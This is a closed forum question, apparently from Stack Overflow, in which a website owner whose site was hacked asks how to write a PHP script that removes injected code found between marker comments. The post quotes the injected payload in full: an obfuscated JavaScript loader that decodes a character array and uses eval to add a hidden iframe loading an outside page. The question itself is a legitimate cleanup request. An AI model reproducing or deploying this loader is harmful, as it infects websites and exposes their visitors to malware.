This question is unlikely to help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. For help making this question more broadly applicable,
visit the help center .
Closed 9 years ago .
One of my sites has been hit with malware. The code that they added to my js files looks like this:
/*7e5a0c*/
v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,117,102,95,104,115,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,116,101,97,103,114,46,114,112,99,31,59,32,38,102,116,115,110,58,46,45,111,105,110,97,119,106,97,108,44,114,116,45,99,110,115,110,115,47,51,45,110,104,111,37,59,12,8,32,31,30,32,116,101,97,103,114,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,96,111,113,98,101,113,30,61,31,37,48,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,104,100,103,103,103,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,115,103,96,102,116,45,113,116,120,106,101,45,106,101,101,114,32,60,30,39,48,110,120,38,57,13,9,30,32,31,30,117,102,95,104,115,44,115,115,119,108,100,44,116,110,110,32,60,30,39,48,110,120,38,57,13,9,11,10,31,30,32,31,103,102,31,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,115,103,96,102,116,38,39,41,31,121,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,117,102,95,104,115,90,39,61,58,47,99,103,118,61,37,41,58,11,10,31,30,32,31,30,32,31,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,116,101,97,103,114,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,117,102,95,104,115,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+492!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)
/*/7e5a0c*/
The code that they added to my php and html files is slightly different, how can I write a php script to step through all of my site files and remove any text between 2 tags, for examnple in the code above, I would have it remove everything between and including /7e5a0c / and /7e5a0c /